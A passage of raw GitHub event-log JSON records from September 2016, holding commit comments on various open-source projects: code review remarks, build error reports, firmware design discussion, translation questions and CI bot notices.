\"log_temp.txt\"\r\n"}},"created_at":"2016-09-05T16:16:29Z"}
{"id":"4517647822","type":"CommitCommentEvent","actor":{"login":"Neikon"},"repo":{"name":"Neikon/Nei-Reshade"},"payload":{"comment":{"id":18902050,"position":null,"line":null,"path":null,"commit_id":"17cc73294652ae2600e8f4e45fb711d2d686ede0","created_at":"2016-09-05T16:17:15Z","updated_at":"2016-09-05T16:17:15Z","body":"prueba"}},"created_at":"2016-09-05T16:17:15Z"}
{"id":"4517652349","type":"CommitCommentEvent","actor":{"login":"christianfrei"},"repo":{"name":"silvanheller/vitrivr-ui"},"payload":{"comment":{"id":18902057,"position":29,"line":179,"path":"js/init.js","commit_id":"dd4946b9a3bd379d4f6d1e594ae11fa0efd08e07","created_at":"2016-09-05T16:18:38Z","updated_at":"2016-09-05T16:18:38Z","body":"That's exactly what I wanted to do. Nice feature that Materialize provides it itself. Thank you!\r\nChanged in a1b431573d9544814390c4500d42f2bd9c750e37"}},"created_at":"2016-09-05T16:18:38Z"}
{"id":"4517652550","type":"CommitCommentEvent","actor":{"login":"fzurita"},"repo":{"name":"mupen64plus-ae/mupen64plus-ae"},"payload":{"comment":{"id":18902058,"position":null,"line":null,"path":null,"commit_id":"17b3cfbfe236438c529345a7509c3f9af6409a19","created_at":"2016-09-05T16:18:43Z","updated_at":"2016-09-05T16:18:43Z","body":"We need to start using the issue tracker so we don't lose track of these."}},"created_at":"2016-09-05T16:18:43Z"}
{"id":"4517655457","type":"CommitCommentEvent","actor":{"login":"hjpotter92"},"repo":{"name":"robbyrussell/oh-my-zsh"},"payload":{"comment":{"id":18902066,"position":5,"line":164,"path":"plugins/git/git.plugin.zsh","commit_id":"298b63513dbbc94f750433e79750d07d96c87d62","created_at":"2016-09-05T16:19:33Z","updated_at":"2016-09-05T16:19:33Z","body":"I think `--format` should be preferred over `--pretty`, as parsing would take a lot of time for the latter.\r\n\r\n## `--pretty[=<format>]`\r\n\r\n> Pretty-print the contents of the commit logs in a given format, where `<format>` can be one of `oneline`, `short`, `medium`, `full`, `fuller`, `email`, `raw`, `format:<string>` and `tformat:<string>`. When `<format>` is none of the above, and has `%placeholder` in it, it acts as if `--pretty=tformat:<format>` were given."}},"created_at":"2016-09-05T16:19:33Z"}
{"id":"4517656265","type":"CommitCommentEvent","actor":{"login":"Nxt3"},"repo":{"name":"ccrama/Slide"},"payload":{"comment":{"id":18902068,"position":null,"line":null,"path":null,"commit_id":"8022521f1fb14d7c7824a6437676901e60e873ed","created_at":"2016-09-05T16:19:48Z","updated_at":"2016-09-05T16:19:48Z","body":"Maybe move them to where normal settings are?\n\nOn Mon, Sep 5, 2016, 12:01 PM Carlos Crane <notifications@github.com> wrote:\n\n> It's pretty hard to figure out how to get to offline mode settings\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ccrama/Slide/commit/8022521f1fb14d7c7824a6437676901e60e873ed#commitcomment-18901936>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ACzfmrHanON4QEtho6Tk1leGTzmy5aF1ks5qnDz1gaJpZM4J0lFs>\n> .\n>\n"}},"created_at":"2016-09-05T16:19:48Z"}
{"id":"4517656917","type":"CommitCommentEvent","actor":{"login":"LuoYuWuSheng"},"repo":{"name":"XDCreater/XD2HandBookStore"},"payload":{"comment":{"id":18902069,"position":null,"line":null,"path":null,"commit_id":"49b7bc2e85ef4e212b64a95b82f948bde185d41a","created_at":"2016-09-05T16:19:59Z","updated_at":"2016-09-05T16:19:59Z","body":"我觉得这个别人的merge 我不应该将这个也merge过来"}},"created_at":"2016-09-05T16:19:59Z"}
{"id":"4517657120","type":"CommitCommentEvent","actor":{"login":"Nxt3"},"repo":{"name":"ccrama/Slide"},"payload":{"comment":{"id":18902071,"position":null,"line":null,"path":null,"commit_id":"8022521f1fb14d7c7824a6437676901e60e873ed","created_at":"2016-09-05T16:20:03Z","updated_at":"2016-09-05T16:20:03Z","body":"But keep the normal \"Go offline\" still in the header.\n\nOn Mon, Sep 5, 2016, 12:19 PM Nate Gantt <nategantt@gmail.com> wrote:\n\n> Maybe move them to where normal settings are?\n>\n> On Mon, Sep 5, 2016, 12:01 PM Carlos Crane <notifications@github.com>\n> wrote:\n>\n>> It's pretty hard to figure out how to get to offline mode settings\n>>\n>> —\n>> You are receiving this because you commented.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/ccrama/Slide/commit/8022521f1fb14d7c7824a6437676901e60e873ed#commitcomment-18901936>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/ACzfmrHanON4QEtho6Tk1leGTzmy5aF1ks5qnDz1gaJpZM4J0lFs>\n>> .\n>>\n>\n"}},"created_at":"2016-09-05T16:20:03Z"}
{"id":"4517657965","type":"CommitCommentEvent","actor":{"login":"MilhouseVH"},"repo":{"name":"notspiff/inputstream.rtmp"},"payload":{"comment":{"id":18902076,"position":4,"line":10,"path":"CMakeLists.txt","commit_id":"e5e4cee142c6614664448318c7b3df3b3809930e","created_at":"2016-09-05T16:20:18Z","updated_at":"2016-09-05T16:20:18Z","body":"Not entirely sure why but, when building LibreELEC, before `find_package(OpenSSL REQUIRED)` is called the value of `${PKG_CONFIG_FOUND}` is not set, however after the call to `find_package(OpenSSL REQUIRED)` the variable is set to `TRUE`, which then causes `FindRTMP.cmake` to take the pkg-config path (https://github.com/notspiff/inputstream.rtmp/blob/master/FindRTMP.cmake#L9-L10), which fails.\r\n\r\n```\r\n-- Checking to see if CXX compiler accepts flag -flto - yes\r\n-- Found OpenSSL: /home/neil/projects/LibreELEC.tv/build.LibreELEC-RPi.arm-8.0-devel/toolchain/armv6zk-libreelec-linux-gnueabi/sysroot/usr/lib/libssl.so;/home/neil/projects/LibreELEC.tv/build.LibreELEC-RPi.arm-8.0-devel/toolchain/armv6zk-libreelec-linux-gnueabi/sysroot/usr/lib/libcrypto.so (found version \"2.0.0\")\r\n-- Found ZLIB: /home/neil/projects/LibreELEC.tv/build.LibreELEC-RPi.arm-8.0-devel/toolchain/armv6zk-libreelec-linux-gnueabi/sysroot/usr/lib/libz.so (found version \"1.2.8\")\r\n-- Checking for module 'librtmp'\r\n--   Found librtmp, version v2.4\r\nCMake Error at /home/neil/projects/LibreELEC.tv/build.LibreELEC-RPi.arm-8.0-devel/toolchain/share/cmake-3.5/Modules/FindPackageHandleStandardArgs.cmake:148 (message):\r\n  Could NOT find RTMP (missing: RTMP_INCLUDE_DIRS)\r\nCall Stack (most recent call first):\r\n  /home/neil/projects/LibreELEC.tv/build.LibreELEC-RPi.arm-8.0-devel/toolchain/share/cmake-3.5/Modules/FindPackageHandleStandardArgs.cmake:388 (_FPHSA_FAILURE_MESSAGE)\r\n  FindRTMP.cmake:17 (find_package_handle_standard_args)\r\n  CMakeLists.txt:12 (find_package)\r\n```\r\n\r\nAdding `unset(PKG_CONFIG_FOUND)` after `find_package(OpenSSL REQUIRED)` fixes the issue, but I'm pretty sure that's not the right solution!\r\n"}},"created_at":"2016-09-05T16:20:18Z"}
{"id":"4517658315","type":"CommitCommentEvent","actor":{"login":"LuoYuWuSheng"},"repo":{"name":"XDCreater/XD2HandBookStore"},"payload":{"comment":{"id":18902077,"position":null,"line":null,"path":null,"commit_id":"61c45fc146a8bf7a929ce2556594f50186b1ae66","created_at":"2016-09-05T16:20:24Z","updated_at":"2016-09-05T16:20:24Z","body":"这是别人做的修改"}},"created_at":"2016-09-05T16:20:24Z"}
{"id":"4517658341","type":"CommitCommentEvent","actor":{"login":"lionng429"},"repo":{"name":"lionng429/react-file-uploader"},"payload":{"comment":{"id":18902078,"position":98,"line":71,"path":"src/UploadHandler.js","commit_id":"1dc67af3c15c6109122f05f0dbc8e205dbcb1fd8","created_at":"2016-09-05T16:20:24Z","updated_at":"2016-09-05T16:20:24Z","body":"Let's make it optional then. I am sorry for that and thank you for letting me know."}},"created_at":"2016-09-05T16:20:24Z"}
{"id":"4517658580","type":"CommitCommentEvent","actor":{"login":"sserg91"},"repo":{"name":"sserg91/pars"},"payload":{"comment":{"id":18902079,"position":423,"line":423,"path":"stylesheets/styles.css","commit_id":"81c229d09e9db55df220d05c58980032c7951519","created_at":"2016-09-05T16:20:29Z","updated_at":"2016-09-05T16:20:29Z","body":"run\r\n\r\n"}},"created_at":"2016-09-05T16:20:29Z"}
{"id":"4517662702","type":"CommitCommentEvent","actor":{"login":"servergit77"},"repo":{"name":"servergit77/Gitrepo"},"payload":{"comment":{"id":18902082,"position":null,"line":null,"path":null,"commit_id":"16123afb56ef60b0399cd087de67a849bfe875f6","created_at":"2016-09-05T16:21:40Z","updated_at":"2016-09-05T16:21:40Z","body":"Build code\r\n #!bin/bash\r\necho\"This is the build code\""}},"created_at":"2016-09-05T16:21:40Z"}
{"id":"4517663163","type":"CommitCommentEvent","actor":{"login":"thopiekar"},"repo":{"name":"Ultimaker/cura-build-environment"},"payload":{"comment":{"id":18902085,"position":null,"line":null,"path":null,"commit_id":"b3f607db930864e8ee35a990efd8b3b6c27f6313","created_at":"2016-09-05T16:21:49Z","updated_at":"2016-09-05T16:21:49Z","body":"@Ghostkeeper Done here: https://bitbucket.org/anthony_tuininga/cx_freeze/issues/204/infinite-loop-while-using-cx_freeze"}},"created_at":"2016-09-05T16:21:49Z"}
{"id":"4517665873","type":"CommitCommentEvent","actor":{"login":"weicannotfly"},"repo":{"name":"weicannotfly/heheda"},"payload":{"comment":{"id":18902090,"position":null,"line":null,"path":null,"commit_id":"aa19b54526ee50ca86a757817ed6ca7125af6fd2","created_at":"2016-09-05T16:22:37Z","updated_at":"2016-09-05T16:22:37Z","body":"hghgh"}},"created_at":"2016-09-05T16:22:37Z"}
{"id":"4517667921","type":"CommitCommentEvent","actor":{"login":"zhangyangyu"},"repo":{"name":"tiran/cpython"},"payload":{"comment":{"id":18902098,"position":null,"line":null,"path":null,"commit_id":"75990d0e0e3f8439f3936797c0aacb1df3c0c74c","created_at":"2016-09-05T16:23:14Z","updated_at":"2016-09-05T16:23:14Z","body":"Except two trivial advices, it LGTM. Nice work!"}},"created_at":"2016-09-05T16:23:14Z"}
{"id":"4517673026","type":"CommitCommentEvent","actor":{"login":"bubnikv"},"repo":{"name":"prusa3d/Prusa-Firmware"},"payload":{"comment":{"id":18902111,"position":null,"line":null,"path":null,"commit_id":"e0bb76032c5ec682da1e0d58214cb02840a6593b","created_at":"2016-09-05T16:24:41Z","updated_at":"2016-09-05T16:24:41Z","body":"Sonny, \r\n\r\nthanks for the hints.\r\n\r\nRegarding the jerk control, there are two big differences compared to the laser cutters and the like. First not all the kinematic is Cartesian. The Prusa3D printers have the Y axis physically decoupled from the X/Z axes. The Y axis moves the print bed, while the Z axis lifts the X axis. For this kind of kinematics it does not make sense to calculate a joint jerk in the XY plane. I actually rewrote the jerk control in our Marlin branch to decouple the X and Y jerks and I will likely extend the firmware to limit the joint X/Z jerk in the future.\r\n\r\nSecond, the 3D printers are a different beast from the laser cutters. It is quite important to maintain a reasonably constant pressure in the nozzle. Therefore it may be advantageous to rather allow higher jerk values than to slow down and speed up the print while changing the extruder pressure.\r\n\r\nVojtech\r\n"}},"created_at":"2016-09-05T16:24:41Z"}
{"id":"4517673154","type":"CommitCommentEvent","actor":{"login":"DahaiJarvis"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":18902112,"position":126,"line":126,"path":"huangyi/role/view.js","commit_id":"db962019134a8a0e608c8343611d15052afdd9fc","created_at":"2016-09-05T16:24:43Z","updated_at":"2016-09-05T16:24:43Z","body":"formData 是干嘛的？"}},"created_at":"2016-09-05T16:24:43Z"}
{"id":"4517677122","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore.Persistence.MongoDB"},"payload":{"comment":{"id":18902117,"position":null,"line":null,"path":null,"commit_id":"d1d07405cece965dce5b9f01507617ee745712b4","created_at":"2016-09-05T16:25:50Z","updated_at":"2016-09-05T16:25:50Z","body":"TeamCity NEventStore :: MongoDB :: Build [Build 144](http://build.prxm.it:8813/viewLog.html?buildId=3651&buildTypeId=nes_mongo_build&guest=1) outcome was **FAILURE**\nSummary: Error while applying patch Build time: 00:01:23"}},"created_at":"2016-09-05T16:25:50Z"}
{"id":"4517677696","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore.Persistence.MongoDB"},"payload":{"comment":{"id":18902120,"position":null,"line":null,"path":null,"commit_id":"d1d07405cece965dce5b9f01507617ee745712b4","created_at":"2016-09-05T16:26:02Z","updated_at":"2016-09-05T16:26:02Z","body":"TeamCity NEventStore :: MongoDB :: Build [Build 144](http://build.prxm.it:8813/viewLog.html?buildId=3651&buildTypeId=nes_mongo_build&guest=1) outcome was **FAILURE**\nSummary: Error while applying patch Build time: 00:01:32"}},"created_at":"2016-09-05T16:26:02Z"}
{"id":"4517679297","type":"CommitCommentEvent","actor":{"login":"jakirkham"},"repo":{"name":"conda-forge/libhwloc-feedstock"},"payload":{"comment":{"id":18902124,"position":null,"line":null,"path":null,"commit_id":"f2e6ce14beeebfe3047f68af721c398fb293ed10","created_at":"2016-09-05T16:26:30Z","updated_at":"2016-09-05T16:26:30Z","body":"Of course.\n\nDon't be sorry. Would rather people raise concerns than not."}},"created_at":"2016-09-05T16:26:30Z"}
{"id":"4517681863","type":"CommitCommentEvent","actor":{"login":"codename-B"},"repo":{"name":"unaussprechlich/HudPixelExtended"},"payload":{"comment":{"id":18902132,"position":null,"line":null,"path":null,"commit_id":"89bfe366b7834bc3aabbe37c8a669c4751f1618a","created_at":"2016-09-05T16:27:15Z","updated_at":"2016-09-05T16:27:15Z","body":"You're welcome!"}},"created_at":"2016-09-05T16:27:15Z"}
{"id":"4517682963","type":"CommitCommentEvent","actor":{"login":"ranyue"},"repo":{"name":"ranyue/jiandao"},"payload":{"comment":{"id":18902137,"position":null,"line":null,"path":null,"commit_id":"f214101718033326826b086f5849ceeb13de7a20","created_at":"2016-09-05T16:27:36Z","updated_at":"2016-09-05T16:27:36Z","body":"滚你妈蛋"}},"created_at":"2016-09-05T16:27:36Z"}
{"id":"4517683225","type":"CommitCommentEvent","actor":{"login":"biophil"},"repo":{"name":"steemit/steem"},"payload":{"comment":{"id":18902139,"position":null,"line":null,"path":null,"commit_id":"6500bb65eb6282866f3c6f356cbcbe09fd03c7bf","created_at":"2016-09-05T16:27:40Z","updated_at":"2016-09-05T16:27:40Z","body":"Got it, thank you for taking the time to dig out the reference. It makes the linear systems theorist inside me cringe pretty hard to hack every single vote to handle an edge case that will almost never occur - but I suppose concessions must be made when you're dealing with integers."}},"created_at":"2016-09-05T16:27:40Z"}
{"id":"4517687339","type":"CommitCommentEvent","actor":{"login":"Gillou68310"},"repo":{"name":"mupen64plus-ae/mupen64plus-ae"},"payload":{"comment":{"id":18902150,"position":null,"line":null,"path":null,"commit_id":"17b3cfbfe236438c529345a7509c3f9af6409a19","created_at":"2016-09-05T16:28:55Z","updated_at":"2016-09-05T16:28:55Z","body":"Yes we do. I'll create the ticket."}},"created_at":"2016-09-05T16:28:55Z"}
{"id":"4517688234","type":"CommitCommentEvent","actor":{"login":"servergit77"},"repo":{"name":"servergit77/Gitrepo"},"payload":{"comment":{"id":18902153,"position":null,"line":null,"path":null,"commit_id":"16123afb56ef60b0399cd087de67a849bfe875f6","created_at":"2016-09-05T16:29:12Z","updated_at":"2016-09-05T16:29:12Z","body":"modified Build"}},"created_at":"2016-09-05T16:29:12Z"}
{"id":"4517689924","type":"CommitCommentEvent","actor":{"login":"ge0ffrey"},"repo":{"name":"droolsjbpm/droolsjbpm-knowledge"},"payload":{"comment":{"id":18902157,"position":17,"line":107,"path":"kie-api/src/main/java/org/kie/api/runtime/rule/EntryPoint.java","commit_id":"9c726705f94fbf63bed3ae74b19e20f98749fbfc","created_at":"2016-09-05T16:29:43Z","updated_at":"2016-09-05T16:29:43Z","body":"I'd recommend to clearly state that derivative properties (even just getters without setters) need to be included too, for example \"fullName\" when \"firstName\" changes. "}},"created_at":"2016-09-05T16:29:43Z"}
{"id":"4517690474","type":"CommitCommentEvent","actor":{"login":"thopiekar"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18902159,"position":13,"line":48,"path":"plugins/UltimakerMachineActions/UpgradeFirmwareMachineAction.qml","commit_id":"66f773434fb18ed74281602cab2a9ecc4378f283","created_at":"2016-09-05T16:29:54Z","updated_at":"2016-09-05T16:29:54Z","body":"Even Germans don't use capital letters all the time.. :stuck_out_tongue_winking_eye: \r\n(Btw, sorry if I do :smile: )"}},"created_at":"2016-09-05T16:29:54Z"}
{"id":"4517694043","type":"CommitCommentEvent","actor":{"login":"igortouguinho"},"repo":{"name":"igortouguinho/EDL"},"payload":{"comment":{"id":18902166,"position":null,"line":null,"path":null,"commit_id":"fdcbbc8565a325f71fcf05578f5f2376a038da14","created_at":"2016-09-05T16:30:55Z","updated_at":"2016-09-05T16:30:55Z","body":"Acabei de enviar o código fonte, havia enviado como print ( trabalho-02(1) ) mas agora enviei o arquivo .lua"}},"created_at":"2016-09-05T16:30:55Z"}
{"id":"4517697934","type":"CommitCommentEvent","actor":{"login":"GiuseppePast"},"repo":{"name":"kaliveda-dev/kaliveda"},"payload":{"comment":{"id":18902175,"position":null,"line":null,"path":null,"commit_id":"85c65e381a36d112e92591b5bb68a195fd4479d0","created_at":"2016-09-05T16:32:04Z","updated_at":"2016-09-05T16:32:04Z","body":"Yes I know and I checked to be sure and effectively it gives the same result.\n\nExcuse me for my pedantry\n\nGiuseppe\n\nOn 05/set/2016, at 16:33, John David Frankland wrote:\n\n> IS normal abs, at least for C++!\n\n"}},"created_at":"2016-09-05T16:32:04Z"}
{"id":"4517698498","type":"CommitCommentEvent","actor":{"login":"Lippe35"},"repo":{"name":"KcNirvana/MA-XML-8.0-PORTUGUESE"},"payload":{"comment":{"id":18902176,"position":31,"line":3934,"path":"Portuguese/device/cancro/Settings.apk/res/values-pt-rPT/strings.xml","commit_id":"c733fd5de4c44d96a181cdf1299df10950154ccb","created_at":"2016-09-05T16:32:13Z","updated_at":"2016-09-05T16:32:13Z","body":"O dicionário pessoal existe sempre ou tem ou não tem correcções de palavras inseridas palavras pelo utilizador"}},"created_at":"2016-09-05T16:32:13Z"}
{"id":"4517700357","type":"CommitCommentEvent","actor":{"login":"Lippe35"},"repo":{"name":"KcNirvana/MA-XML-8.0-PORTUGUESE"},"payload":{"comment":{"id":18902177,"position":22,"line":3342,"path":"Portuguese/device/cancro/Settings.apk/res/values-pt-rPT/strings.xml","commit_id":"c733fd5de4c44d96a181cdf1299df10950154ccb","created_at":"2016-09-05T16:32:51Z","updated_at":"2016-09-05T16:32:51Z","body":"Janela transparente do que? referes-te a que janela? "}},"created_at":"2016-09-05T16:32:51Z"}
{"id":"4517703719","type":"CommitCommentEvent","actor":{"login":"Babygogogo"},"repo":{"name":"Babygogogo/BabyWars"},"payload":{"comment":{"id":18902184,"position":null,"line":null,"path":null,"commit_id":"1fb1f9f7b34fed0cfe07212727c22ff7b3b87157","created_at":"2016-09-05T16:33:59Z","updated_at":"2016-09-05T16:33:59Z","body":"This should help fix #36 ."}},"created_at":"2016-09-05T16:33:59Z"}
{"id":"4517703781","type":"CommitCommentEvent","actor":{"login":"Lippe35"},"repo":{"name":"KcNirvana/MA-XML-8.0-PORTUGUESE"},"payload":{"comment":{"id":18902186,"position":13,"line":2695,"path":"Portuguese/device/cancro/Settings.apk/res/values-pt-rPT/strings.xml","commit_id":"c733fd5de4c44d96a181cdf1299df10950154ccb","created_at":"2016-09-05T16:34:01Z","updated_at":"2016-09-05T16:34:01Z","body":"Tens dados Móveis em maiúscula ainda hoje adicionaste com maiúscula uma alteração, porque é que na tradução esta linha é diferente?"}},"created_at":"2016-09-05T16:34:01Z"}
{"id":"4517705621","type":"CommitCommentEvent","actor":{"login":"Lippe35"},"repo":{"name":"KcNirvana/MA-XML-8.0-PORTUGUESE"},"payload":{"comment":{"id":18902189,"position":4,"line":1571,"path":"Portuguese/device/cancro/Settings.apk/res/values-pt-rPT/strings.xml","commit_id":"c733fd5de4c44d96a181cdf1299df10950154ccb","created_at":"2016-09-05T16:34:37Z","updated_at":"2016-09-05T16:34:37Z","body":"É para retirar esta linha em todos os dispositivos 6.0? Ou fica só no Gemini?"}},"created_at":"2016-09-05T16:34:37Z"}
{"id":"4517706387","type":"CommitCommentEvent","actor":{"login":"akorshun"},"repo":{"name":"Jenly/android_cm_device_xiaomi_aries"},"payload":{"comment":{"id":18902191,"position":null,"line":null,"path":null,"commit_id":"7a8c83a3e9a5048c962f76c44b2a67aaa37282ce","created_at":"2016-09-05T16:34:52Z","updated_at":"2016-09-05T16:34:52Z","body":"is your device tree working with latest xiaomi partition (merged system and merged data)"}},"created_at":"2016-09-05T16:34:52Z"}
{"id":"4517711706","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":18902200,"position":null,"line":null,"path":null,"commit_id":"035599ba6067dfe11eac5d01310c4c1daf0831d3","created_at":"2016-09-05T16:36:32Z","updated_at":"2016-09-05T16:36:32Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/392/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-1928)."}},"created_at":"2016-09-05T16:36:32Z"}
{"id":"4517720183","type":"CommitCommentEvent","actor":{"login":"chamnit"},"repo":{"name":"prusa3d/Prusa-Firmware"},"payload":{"comment":{"id":18902214,"position":null,"line":null,"path":null,"commit_id":"e0bb76032c5ec682da1e0d58214cb02840a6593b","created_at":"2016-09-05T16:39:14Z","updated_at":"2016-09-05T16:39:14Z","body":"@bubnikv : The Y-axis decoupling and extruder pressure requirements makes sense, but the centripetal acceleration calculation is still valid IMO. It can be modified to just include the mechanical components that are dynamically coupled, like the X-Z axes. However, I suppose since the Z-axis doesn't move that much, the 3d printer machines, like the Prusa, have accommodated this inherently by their design. \r\n\r\nAlthough, Delta printers would benefit more by including more accurate dynamic junction model, if they don't already have it. That's something I'll have to think more about as I move forward. Thanks for the insight!"}},"created_at":"2016-09-05T16:39:14Z"}
{"id":"4517724237","type":"CommitCommentEvent","actor":{"login":"thopiekar"},"repo":{"name":"Ultimaker/Uranium"},"payload":{"comment":{"id":18902229,"position":null,"line":null,"path":null,"commit_id":"cff519a897611b7b578d260af50e7b46d8434262","created_at":"2016-09-05T16:40:28Z","updated_at":"2016-09-05T16:40:28Z","body":"@sedwards2009 : Don't trust me blindly next time :smile:  "}},"created_at":"2016-09-05T16:40:28Z"}
{"id":"4517725805","type":"CommitCommentEvent","actor":{"login":"qasim"},"repo":{"name":"cobalt-uoft/uoft-scrapers"},"payload":{"comment":{"id":18902236,"position":null,"line":null,"path":null,"commit_id":"58b205d849c08630a136ff0a17538426106c56a4","created_at":"2016-09-05T16:40:57Z","updated_at":"2016-09-05T16:40:57Z","body":"@kshvmdn that's what I get for rushing a merge on vacation. 😭 Oops, let me remove that."}},"created_at":"2016-09-05T16:40:57Z"}
{"id":"4517729278","type":"CommitCommentEvent","actor":{"login":"tsidv"},"repo":{"name":"tsidv/kpi"},"payload":{"comment":{"id":18902249,"position":5,"line":152,"path":"antennaOffsetFilesDecoderModule/antennaOffsetParser.py","commit_id":"78b19de2d9802c425e3126a2378ca69045e55eae","created_at":"2016-09-05T16:42:05Z","updated_at":"2016-09-05T16:42:05Z","body":"?"}},"created_at":"2016-09-05T16:42:05Z"}
{"id":"4517732680","type":"CommitCommentEvent","actor":{"login":"armaurya"},"repo":{"name":"armaurya/ListTable"},"payload":{"comment":{"id":18902255,"position":4,"line":114,"path":"src/main/java/com/listTable/ListTable.java","commit_id":"8cc5796a8826e3435cac635b2bf5d994eb03f889","created_at":"2016-09-05T16:43:13Z","updated_at":"2016-09-05T16:43:13Z","body":"Ignore\r\n"}},"created_at":"2016-09-05T16:43:13Z"}
{"id":"4517734228","type":"CommitCommentEvent","actor":{"login":"iamgoangle"},"repo":{"name":"pongsakornsemsuwan/brownbox"},"payload":{"comment":{"id":18902259,"position":4,"line":29,"path":"app/components/app.js","commit_id":"2d17af13ad492761284d5d0aba013b3a68118ea9","created_at":"2016-09-05T16:43:42Z","updated_at":"2016-09-05T16:43:42Z","body":"https://facebook.github.io/react/docs/component-specs.html#updating-componentdidupdate\r\n\r\nไม่แน่ใจว่า life cycle ตัวนี้ จากข้อความที่ว่า flushed to the DOM มัน คือ การสั่ง ให้ virtual dom update รึป่าว ถ้าใช่ ไม่แน่ใจว่ามันดีไหม เพราะ Component App ทำหน้าที่เหมือน layout ซึ่ง Header, Footer ไม่ค่อยเปลี่ยนอ่ะ \r\n\r\nการ flush to update มันจะดีไหม หว่าา ต้องรอผู้รู้"}},"created_at":"2016-09-05T16:43:42Z"}
{"id":"4517735484","type":"CommitCommentEvent","actor":{"login":"JakeChampion"},"repo":{"name":"Financial-Times/polyfill-service"},"payload":{"comment":{"id":18902261,"position":null,"line":null,"path":null,"commit_id":"773edd3121ef002ea2bea9137ac00cdba82dc08a","created_at":"2016-09-05T16:44:08Z","updated_at":"2016-09-05T16:44:08Z","body":"Here is the repo - https://github.com/Financial-Times/ft.com-cdn/"}},"created_at":"2016-09-05T16:44:08Z"}
{"id":"4517740697","type":"CommitCommentEvent","actor":{"login":"Dog2puppy"},"repo":{"name":"ImagicalTeam/LEET-Party"},"payload":{"comment":{"id":18902269,"position":null,"line":null,"path":null,"commit_id":"f5167427206c460e0089c030be9ac8c295bb6698","created_at":"2016-09-05T16:45:51Z","updated_at":"2016-09-05T16:45:51Z","body":"perms suck."}},"created_at":"2016-09-05T16:45:51Z"}
{"id":"4517741427","type":"CommitCommentEvent","actor":{"login":"Dog2puppy"},"repo":{"name":"ImagicalTeam/LEET-Party"},"payload":{"comment":{"id":18902274,"position":null,"line":null,"path":null,"commit_id":"f5167427206c460e0089c030be9ac8c295bb6698","created_at":"2016-09-05T16:46:06Z","updated_at":"2016-09-05T16:46:06Z","body":"and there not nesacary\r\n"}},"created_at":"2016-09-05T16:46:06Z"}
{"id":"4517742944","type":"CommitCommentEvent","actor":{"login":"iainwatts"},"repo":{"name":"iainwatts/test"},"payload":{"comment":{"id":18902276,"position":null,"line":null,"path":null,"commit_id":"8c0a4e24d1221eaec652cc482cc7977337b6f0e3","created_at":"2016-09-05T16:46:35Z","updated_at":"2016-09-05T16:46:35Z","body":"A comment."}},"created_at":"2016-09-05T16:46:35Z"}
{"id":"4517745266","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":18902283,"position":null,"line":null,"path":null,"commit_id":"5b6541a8c9689dbd26ade934753a4b55c6640733","created_at":"2016-09-05T16:47:27Z","updated_at":"2016-09-05T16:47:27Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/394/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-1928)."}},"created_at":"2016-09-05T16:47:27Z"}
{"id":"4517749055","type":"CommitCommentEvent","actor":{"login":"salix5"},"repo":{"name":"Fluorohydride/ygopro"},"payload":{"comment":{"id":18902293,"position":null,"line":null,"path":null,"commit_id":"124ef5614865a9920c764f8241f97ade100bdf8b","created_at":"2016-09-05T16:48:44Z","updated_at":"2016-09-05T16:48:44Z","body":"@DailyShana \r\n原本的架構中，骨架王奧米加等同時選擇雙方除外區的效果有可能產生：灰灰白白灰灰\r\n這會失去原本連續的白->連續的灰從而能夠快速分辨從哪張開始是對手的卡這個良好的特性\r\n\r\n目前初步的想法是用文字顏色區分\r\n黑色：表側/用目視得知\r\n藍色：裡側/用確認得知\r\n\r\n未來即使有超量素材和除外區/額外牌組的卡一起選擇的情形\r\n原則上不同的區域的卡也會分開來選\r\n因此原本的藍色定義應該不至於混淆，目前暫時不考慮加入新顏色而採用藍色\r\n\r\nCurrent setting:\r\nface-up: black text (by seeing)\r\nface-down: blue text (by confirming)\r\nSince a card must have a unique location at any given time, this definition of text color is well-defined.\r\nSo we still use blue color, and we does not introduce more new colors so far."}},"created_at":"2016-09-05T16:48:44Z"}
{"id":"4517751566","type":"CommitCommentEvent","actor":{"login":"StefH"},"repo":{"name":"primefaces/primeng"},"payload":{"comment":{"id":18902299,"position":null,"line":null,"path":null,"commit_id":"c0b9d3807f87528fab304c4e73679c4e60dc4689","created_at":"2016-09-05T16:49:32Z","updated_at":"2016-09-05T16:49:32Z","body":"Why not change all these **dependencies** to **devDependencies** ?\r\n\r\nExample\r\nhttps://github.com/StefH/serverless-aws-lambda-typescript-examples/blob/master/serverless-aws-lambda-typescript-webpack/package.json#L17"}},"created_at":"2016-09-05T16:49:32Z"}
{"id":"4517753190","type":"CommitCommentEvent","actor":{"login":"smithfarm"},"repo":{"name":"smithfarm/dochazka-rest"},"payload":{"comment":{"id":18902302,"position":null,"line":null,"path":null,"commit_id":"a1a5e8c333b14e4a39f900b6a9348d6697880eb8","created_at":"2016-09-05T16:50:03Z","updated_at":"2016-09-05T16:50:03Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;WHT4LSvs&#x2F;12-document-how-to-re-initialize-the-database\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Document how to (re-)initialize the database</a>"}},"created_at":"2016-09-05T16:50:03Z"}
